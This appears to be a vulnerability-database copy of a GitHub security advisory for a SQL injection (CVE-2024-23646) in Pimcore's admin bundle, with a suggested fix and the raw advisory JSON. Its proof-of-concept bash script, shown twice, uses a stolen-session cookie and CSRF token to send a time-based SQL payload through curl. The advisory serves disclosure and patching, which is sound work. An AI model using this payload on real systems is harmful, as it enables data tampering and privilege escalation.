ghsa-cwx6-4wmf-c6xv
Vulnerability from github
Published
2024-01-24 20:54
Modified
2024-01-24 21:34
Severity ?
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
SQL Injection in Admin download files as zip
Details

Summary

The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.

Details

downloadAsZipJobsAction escape parameters, but downloadAsZipAddFilesAction not. The following code should be added: foreach ($selectedIds as $selectedId) { if ($selectedId) { $quotedSelectedIds[] = $db->quote($selectedId); } }

PoC

  • Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)
  • Log In. Grab the X-pimcore-csrf-token header from any request to the backend, as well as the PHPSESSID cookie.
  • Run the following script, substituting the values accordingly: ```

!/bin/bash

BASE_URL=http://localhost # REPLACE THIS! CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS! COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS! SQL="(select*from(select(sleep(6)))a)"

curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \ -X GET \ -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \ -H "Cookie: ${COOKIE}" ` ``` - The response is delayed by 6 seconds.

Impact

Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/admin-ui-classic-bundle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23646"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-24T20:54:15Z",
    "nvd_published_at": "2024-01-24T20:15:53Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe application allows to create zip files from available files on the site. The parameter \"selectedIds\", is susceptible to SQL Injection.\n\n### Details\n[downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escape parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) not.\nThe following code should be added:\n```\n  foreach ($selectedIds as $selectedId) {\n      if ($selectedId) {\n          $quotedSelectedIds[] = $db-\u003equote($selectedId);\n      }\n  }\n```\n\n### PoC\n\n- Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)\n- Log In. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie.\n- Run the following script, substituting the values accordingly: \n```\n#!/bin/bash\nBASE_URL=http://localhost # REPLACE THIS!\nCSRF_TOKEN=\"5133f9d5d28de7dbab39e33ac7036271284ee42e\" # REPLACE THIS!\nCOOKIE=\"PHPSESSID=4312797207ba3b342b29218fa42f3aa3\" # REPLACE THIS!\nSQL=\"(select*from(select(sleep(6)))a)\"\n\ncurl \"${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093\u0026id=1\u0026selectedIds=1,${SQL}\u0026offset=10\u0026limit=5\u0026jobId=655cb18a37b01\" \\\n    -X GET \\\n    -H \"X-pimcore-csrf-token: ${CSRF_TOKEN}\" \\\n    -H \"Cookie: ${COOKIE}\" `\n```\n- The response is delayed by 6 seconds.\n\n### Impact\nAny backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.\n",
  "id": "GHSA-cwx6-4wmf-c6xv",
  "modified": "2024-01-24T21:34:22Z",
  "published": "2024-01-24T20:54:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23646"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pimcore/admin-ui-classic-bundle"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SQL Injection in Admin download files as zip"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.